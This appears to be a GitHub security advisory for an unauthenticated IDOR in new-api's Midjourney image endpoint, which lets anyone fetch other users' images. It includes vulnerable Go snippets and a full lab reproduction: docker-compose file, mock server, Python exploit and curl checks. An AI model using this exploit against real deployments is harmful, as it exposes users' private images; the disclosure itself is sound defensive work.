Skip to content

Instantly share code, notes, and snippets.

@YLChen-007
Created April 6, 2026 04:31
Show Gist options
  • Select an option

  • Save YLChen-007/13974ead25fc6dac42fd7bac62fbb2df to your computer and use it in GitHub Desktop.

Select an option

Save YLChen-007/13974ead25fc6dac42fd7bac62fbb2df to your computer and use it in GitHub Desktop.
Unauthenticated IDOR in `/mj/image/:id` Allows Cross-User Midjourney Image Disclosure

Advisory Details

Title: Unauthenticated IDOR in /mj/image/:id Allows Cross-User Midjourney Image Disclosure

Description:

Summary

An authorization flaw in the Midjourney image relay endpoint allows an unauthenticated attacker to retrieve image content that belongs to other users.

The endpoint /mj/image/:id is reachable without TokenAuth, and the handler resolves tasks via mj_id only (GetByOnlyMJId) without user ownership validation. As a result, any attacker who can obtain or guess a valid mj_id can directly exfiltrate another user's generated image.

Details

Root cause is a two-part logic flaw:

  1. Missing authentication on endpoint

    • In router/relay-router.go, GET /mj/image/:id is registered before middleware application.
    • TokenAuth/Distribute are applied only after this route registration.
  2. Missing object-level authorization

    • RelayMidjourneyImage in relay/mjproxy_handler.go calls:
      • model.GetByOnlyMJId(taskId)
    • GetByOnlyMJId in model/midjourney.go performs WHERE mj_id = ? only.
    • There is no user_id binding in this code path.

Execution flow:

Attacker -> GET /mj/image/{victim_mj_id} (no token)
         -> RelayMidjourneyImage
         -> GetByOnlyMJId(victim_mj_id)
         -> server-side GET midjourneyTask.ImageUrl
         -> io.Copy(...) stream image to attacker

Relevant vulnerable snippets:

// router/relay-router.go
relayMjRouter.GET("/image/:id", relay.RelayMidjourneyImage)
relayMjRouter.Use(middleware.TokenAuth(), middleware.Distribute())
// relay/mjproxy_handler.go
taskId := c.Param("id")
midjourneyTask := model.GetByOnlyMJId(taskId)
resp, err := httpClient.Get(midjourneyTask.ImageUrl)
_, err = io.Copy(c.Writer, resp.Body)
// model/midjourney.go
func GetByOnlyMJId(mjId string) *Midjourney {
    err = DB.Where("mj_id = ?", mjId).First(&mj).Error
}

PoC

The following PoC is fully standalone and reproduces the issue from an external network perspective.

  1. Save the following as docker-compose.yml:
version: "3.8"

services:
  new-api:
    image: calciumion/new-api:latest
    restart: unless-stopped
    command: --log-dir /app/logs
    ports:
      - "3301:3000"
    environment:
      SQL_DSN: postgresql://root:123456@postgres:5432/new-api
      REDIS_CONN_STRING: redis://redis
      TZ: UTC
      ERROR_LOG_ENABLED: "true"
      BATCH_UPDATE_ENABLED: "true"
    volumes:
      - ./data:/data
      - ./logs:/app/logs
    depends_on:
      - redis
      - postgres
      - mock-mj
    networks:
      - idor-net
    healthcheck:
      test: ["CMD-SHELL", "wget -q -O - http://localhost:3000/api/status | grep -o '\"success\":\\s*true' || exit 1"]
      interval: 20s
      timeout: 10s
      retries: 5

  redis:
    image: redis:latest
    restart: unless-stopped
    networks:
      - idor-net

  postgres:
    image: postgres:15
    restart: unless-stopped
    environment:
      POSTGRES_USER: root
      POSTGRES_PASSWORD: 123456
      POSTGRES_DB: new-api
    volumes:
      - pg_data:/var/lib/postgresql/data
    networks:
      - idor-net

  mock-mj:
    image: python:3.12-alpine
    restart: unless-stopped
    working_dir: /app
    command: ["python", "/app/mock_mj_server.py"]
    volumes:
      - ./mock_mj_server.py:/app/mock_mj_server.py:ro
    networks:
      - idor-net

volumes:
  pg_data:

networks:
  idor-net:
    driver: bridge
  1. Save the following as mock_mj_server.py:
from http.server import BaseHTTPRequestHandler, HTTPServer
import json
import time


class Handler(BaseHTTPRequestHandler):
    def log_message(self, fmt, *args):
        return

    def _json(self, code, payload):
        body = json.dumps(payload).encode("utf-8")
        self.send_response(code)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_POST(self):
        if self.path == "/mj/submit/imagine":
            task_id = f"victim-mj-{int(time.time() * 1000)}"
            self._json(
                200,
                {
                    "code": 21,
                    "description": "task already exists",
                    "result": task_id,
                    "properties": {
                        "status": "SUCCESS",
                        "imageUrl": "https://httpbin.org/image/jpeg",
                    },
                },
            )
            return
        self._json(404, {"error": "not_found"})

    def do_GET(self):
        self._json(404, {"error": "not_found"})


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 80), Handler).serve_forever()
  1. Save the following as poc_exploit.py:
import json
import os
import sys
import time
import hashlib

import requests


BASE_URL = os.getenv("TARGET_URL", "http://127.0.0.1:3301").rstrip("/")
LOGIN_USER = os.getenv("LOGIN_USER", "root")
DEFAULT_SETUP_PASS = "12345678"
LOGIN_PASS = os.getenv("LOGIN_PASS", DEFAULT_SETUP_PASS)


def fail(msg):
    print(f"[FAIL] {msg}")
    sys.exit(1)


def expect_json(resp, step):
    try:
        return resp.json()
    except Exception:
        fail(f"{step}: non-json response status={resp.status_code} body={resp.text[:300]}")


def api_success(resp, step):
    body = expect_json(resp, step)
    if resp.status_code != 200 or not body.get("success"):
        fail(f"{step}: status={resp.status_code} body={json.dumps(body, ensure_ascii=True)}")
    return body


def find_token_id(items, token_name):
    candidates = [item for item in items if item.get("name") == token_name and item.get("id") is not None]
    if not candidates:
        return None
    candidates.sort(key=lambda x: int(x.get("id", 0)), reverse=True)
    return int(candidates[0]["id"])


def ensure_setup(session):
    resp = session.get(f"{BASE_URL}/api/setup", timeout=15)
    body = expect_json(resp, "get setup")
    if resp.status_code != 200 or not body.get("success"):
        fail(f"get setup failed: status={resp.status_code} body={json.dumps(body, ensure_ascii=True)}")
    data = body.get("data") or {}
    if data.get("status"):
        return LOGIN_PASS
    setup_pass = LOGIN_PASS if len(LOGIN_PASS) >= 8 else DEFAULT_SETUP_PASS
    setup_resp = session.post(
        f"{BASE_URL}/api/setup",
        json={
            "username": LOGIN_USER,
            "password": setup_pass,
            "confirmPassword": setup_pass,
            "SelfUseModeEnabled": False,
            "DemoSiteEnabled": False,
        },
        timeout=15,
    )
    setup_body = expect_json(setup_resp, "post setup")
    if setup_resp.status_code != 200 or not setup_body.get("success"):
        fail(f"post setup failed: status={setup_resp.status_code} body={json.dumps(setup_body, ensure_ascii=True)}")
    print("[+] Initialized target via /api/setup")
    return setup_pass


def login(session, password_candidates):
    for candidate in password_candidates:
        login_resp = session.post(
            f"{BASE_URL}/api/user/login",
            json={"username": LOGIN_USER, "password": candidate},
            timeout=15,
        )
        login_body = expect_json(login_resp, "login")
        if login_resp.status_code == 200 and login_body.get("success"):
            user_id = ((login_body.get("data") or {}).get("id"))
            if user_id is None:
                fail("login success but missing user id")
            print("[+] Logged in as root via external API")
            return candidate, int(user_id)
    fail("login failed with all password candidates")


def clear_existing_channels(session):
    list_resp = session.get(f"{BASE_URL}/api/channel/?p=0&page_size=200", timeout=20)
    list_body = api_success(list_resp, "list channels")
    items = ((list_body.get("data") or {}).get("items") or [])
    for item in items:
        channel_id = item.get("id")
        if channel_id is None:
            continue
        del_resp = session.delete(f"{BASE_URL}/api/channel/{int(channel_id)}", timeout=20)
        del_body = expect_json(del_resp, f"delete channel {channel_id}")
        if del_resp.status_code != 200 or not del_body.get("success"):
            fail(f"delete channel {channel_id} failed: status={del_resp.status_code} body={json.dumps(del_body, ensure_ascii=True)}")


def main():
    session = requests.Session()

    setup_pass = ensure_setup(session)
    candidates = []
    for value in [setup_pass, LOGIN_PASS, DEFAULT_SETUP_PASS, "123456"]:
        if value and value not in candidates:
            candidates.append(value)
    _, user_id = login(session, candidates)
    session.headers.update({"New-Api-User": str(user_id)})

    ts = int(time.time())
    channel_name = f"idor-mj-channel-{ts}"
    clear_existing_channels(session)
    add_channel_resp = session.post(
        f"{BASE_URL}/api/channel/",
        json={
            "mode": "single",
            "channel": {
                "name": channel_name,
                "type": 2,
                "key": "mock-midjourney-key",
                "base_url": "http://mock-mj",
                "group": "default",
                "models": "mj_imagine",
                "status": 1,
            },
        },
        timeout=15,
    )
    api_success(add_channel_resp, "create channel")
    print(f"[+] Created Midjourney channel: {channel_name}")

    fix_resp = session.post(f"{BASE_URL}/api/channel/fix", json={}, timeout=15)
    api_success(fix_resp, "fix channel abilities")

    token_name = f"idor-mj-token-{ts}"
    add_token_resp = session.post(
        f"{BASE_URL}/api/token/",
        json={
            "name": token_name,
            "remain_quota": 100000000,
            "unlimited_quota": True,
            "expired_time": -1,
            "model_limits_enabled": False,
            "group": "default",
        },
        timeout=15,
    )
    api_success(add_token_resp, "create token")

    list_token_resp = session.get(f"{BASE_URL}/api/token/?p=0&page_size=100", timeout=15)
    list_token_body = api_success(list_token_resp, "list tokens")
    items = ((list_token_body.get("data") or {}).get("items") or [])
    token_id = find_token_id(items, token_name)
    if token_id is None:
        fail("unable to locate created token id")

    key_resp = session.post(f"{BASE_URL}/api/token/{token_id}/key", json={}, timeout=15)
    key_body = api_success(key_resp, "get token key")
    full_key = ((key_body.get("data") or {}).get("key") or "").strip()
    if not full_key:
        fail("empty token key")
    print(f"[+] Retrieved API token id={token_id}")

    submit_resp = session.post(
        f"{BASE_URL}/mj/submit/imagine",
        headers={"Authorization": f"Bearer {full_key}"},
        json={"prompt": "victim confidential render"},
        timeout=20,
    )
    submit_body = expect_json(submit_resp, "submit imagine")
    submit_code = int(submit_body.get("code", -1))
    if submit_resp.status_code != 200 or submit_code not in (1, 21):
        fail(f"submit failed: status={submit_resp.status_code} body={json.dumps(submit_body, ensure_ascii=True)}")

    mj_id = str(submit_body.get("result", "")).strip()
    if not mj_id:
        fail("submit response missing mj_id")
    print(f"[+] Victim task created with mj_id={mj_id}")

    exploit_resp = requests.get(f"{BASE_URL}/mj/image/{mj_id}", timeout=20)
    if exploit_resp.status_code != 200:
        fail(f"unauthenticated image fetch failed: status={exploit_resp.status_code} body={exploit_resp.text[:300]}")

    content_type = exploit_resp.headers.get("Content-Type", "")
    if "image" not in content_type.lower():
        fail(f"unexpected content type from leak endpoint: {content_type}")

    reference_resp = requests.get("https://httpbin.org/image/jpeg", timeout=20)
    if reference_resp.status_code != 200:
        fail(f"failed to fetch reference image: status={reference_resp.status_code}")

    leaked_hash = hashlib.sha256(exploit_resp.content).hexdigest()
    reference_hash = hashlib.sha256(reference_resp.content).hexdigest()
    if leaked_hash != reference_hash:
        fail("leaked response does not match expected victim image bytes")

    with open("stolen_image.jpg", "wb") as f:
        f.write(exploit_resp.content)

    with open("exploit_result.log", "w", encoding="utf-8") as f:
        f.write(f"target={BASE_URL}\\n")
        f.write(f"mj_id={mj_id}\\n")
        f.write(f"status={exploit_resp.status_code}\\n")
        f.write(f"content_type={content_type}\\n")
        f.write(f"bytes={len(exploit_resp.content)}\\n")
        f.write(f"leaked_sha256={leaked_hash}\\n")
        f.write(f"reference_sha256={reference_hash}\\n")

    print("[EXPLOITED-EXTERNAL] Unauthenticated attacker retrieved victim image bytes")
    print(f"[+] Evidence saved: stolen_image.jpg, exploit_result.log (mj_id={mj_id})")


if __name__ == "__main__":
    main()
  1. (Optional but recommended control) Save as control-auth_enforced.py:
import os
import re
import sys

import requests


BASE_URL = os.getenv("TARGET_URL", "http://127.0.0.1:3301").rstrip("/")


def fail(msg):
    print(f"[FAIL] {msg}")
    sys.exit(1)


def load_mj_id():
    value = os.getenv("MJ_ID", "").strip()
    if value:
        return value
    if not os.path.exists("exploit_result.log"):
        return ""
    data = open("exploit_result.log", "r", encoding="utf-8").read()
    m = re.search(r"^mj_id=(.+)$", data, flags=re.MULTILINE)
    return m.group(1).strip() if m else ""


def main():
    mj_id = load_mj_id()
    if not mj_id:
        fail("missing mj_id; run poc_exploit.py first or set MJ_ID")

    resp = requests.get(f"{BASE_URL}/mj/task/{mj_id}/fetch", timeout=15)
    if resp.status_code not in (401, 403):
        fail(f"expected auth enforcement (401/403), got status={resp.status_code} body={resp.text[:300]}")

    with open("control_result.log", "w", encoding="utf-8") as f:
        f.write(f"target={BASE_URL}\\n")
        f.write(f"mj_id={mj_id}\\n")
        f.write(f"status={resp.status_code}\\n")

    print("[CONTROL-BLOCKED] Protected Midjourney endpoint denied unauthenticated access")
    print(f"[+] Evidence saved: control_result.log (status={resp.status_code})")


if __name__ == "__main__":
    main()
  1. Run:
docker compose up -d
python3 poc_exploit.py
python3 control-auth_enforced.py
  1. Minimal direct HTTP verification:
MJ_ID=$(awk -F= '/^mj_id=/{print $2}' exploit_result.log)
curl -sS -o /tmp/mj_leak.jpg -w 'unauth_image_http=%{http_code} ct=%{content_type} bytes=%{size_download}\n' "http://127.0.0.1:3301/mj/image/$MJ_ID"
curl -sS -o /tmp/mj_control.txt -w 'unauth_task_http=%{http_code}\n' "http://127.0.0.1:3301/mj/task/$MJ_ID/fetch"

Log of Evidence

Runtime evidence from the PoC execution:

[+] Logged in as root via external API
[+] Created Midjourney channel: idor-mj-channel-1775211177
[+] Retrieved API token id=9
[+] Victim task created with mj_id=victim-mj-1775211177224
[EXPLOITED-EXTERNAL] Unauthenticated attacker retrieved victim image bytes
[CONTROL-BLOCKED] Protected Midjourney endpoint denied unauthenticated access

Generated logs:

# exploit_result.log
target=http://127.0.0.1:3301
mj_id=victim-mj-1775211177224
status=200
content_type=image/jpeg
bytes=35588
leaked_sha256=c028d7aa15e851b0eefb31638a1856498a237faf1829050832d3b9b19f9ab75f
reference_sha256=c028d7aa15e851b0eefb31638a1856498a237faf1829050832d3b9b19f9ab75f

# control_result.log
target=http://127.0.0.1:3301
mj_id=victim-mj-1775211177224
status=401

Manual curl verification:

unauth_image_http=200 ct=image/jpeg bytes=35588
unauth_task_http=401

Impact

This is an unauthenticated object-level authorization bypass (IDOR) leading to sensitive data disclosure.

  • Any external attacker can fetch another user's Midjourney image if a valid mj_id is known.
  • Cross-tenant data isolation is broken.
  • Private generated assets (designs, user-upload-derived images, potentially sensitive visual content) can be exfiltrated without credentials.

Affected products

  • Ecosystem: go
  • Package name: QuantumNous/new-api
  • Affected versions: Confirmed on v0.12.1 (and any build containing the same route order + GetByOnlyMJId authorization logic)
  • Patched versions:

Severity

  • Severity: High
  • Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Weaknesses

  • CWE: CWE-639: Authorization Bypass Through User-Controlled Key

Occurrences

Permalink Description
https://github.com/QuantumNous/new-api/blob/main/router/relay-router.go#L203-L205 /mj/image/:id is registered before TokenAuth middleware, leaving the endpoint unauthenticated.
https://github.com/QuantumNous/new-api/blob/main/relay/mjproxy_handler.go#L28-L53 RelayMidjourneyImage reads path id, resolves task by ID only, and performs server-side fetch of the stored image URL.
https://github.com/QuantumNous/new-api/blob/main/relay/mjproxy_handler.go#L74-L76 The response body is directly streamed to the requester, completing unauthorized data exfiltration.
https://github.com/QuantumNous/new-api/blob/main/model/midjourney.go#L104-L111 GetByOnlyMJId uses WHERE mj_id = ? without user ownership checks.
https://github.com/QuantumNous/new-api/blob/main/model/midjourney.go#L114-L121 A safer user-scoped query (GetByMJId(userId, mjId)) exists but is not used by /mj/image/:id.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment